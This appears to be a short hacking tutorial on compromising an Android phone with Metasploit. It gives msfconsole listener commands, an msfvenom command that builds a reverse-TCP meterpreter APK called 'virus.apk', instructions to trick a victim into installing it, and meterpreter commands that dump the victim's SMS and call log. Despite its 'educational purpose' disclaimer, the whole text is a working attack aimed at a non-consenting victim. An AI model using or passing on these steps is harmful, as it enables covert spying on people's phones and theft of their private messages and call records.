Hack Android Mobile with Metasploit [Same Network]

Disclaimer: This tutorial is only for educational purpose. We are not responsible for any misuse of this tutorial.

Scenario: Victim uses android smart phone. Attackers needs the call log and SMS of the victim.

Requirements:

1. Metasploit

2. Linux/Windows [For demonstration I am using Ubuntu 14.04]

3. Social Engineering

Steps:

1. Open terminal and type “sudo msfconsole” 

2. After few seconds metasploit will be loaded.

3. Type “use exploit/multi/handler”

4. Type “set PAYLOAD android/meterpreter/reverse_tcp”

5. Type “set LHOST 10.13.37.107” [LHOST=Attacker’s ip over network]

6. Type “exploit”

7. After typing exploit we just create a listener which is waiting for an incoming connection.

8. Now let’s make a malicious apk file with metasploit by typing following command:

sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=10.13.37.107 LPORT=4444 > virus.apk

9. You can find virus.apk file in your home folder.

10. Send this virus.apk file to victim’s phone and convince him to install it. Whenever victim installs that and opens the file, a remote connection will be made from victim’s IP to attackers IP on port 4444. Our metasploit listener will catch this connection and open a meterpreter session.

11. Type “sysinfo” to check the remote android system information.

12. Type “dump_sms” to dump all SMS of victim.

13. Type “dump_calllog” to dump the call history.

Conclusion: This will work on same network. Follow us for our next tutorial where we will show you show to use this exploit on a different network.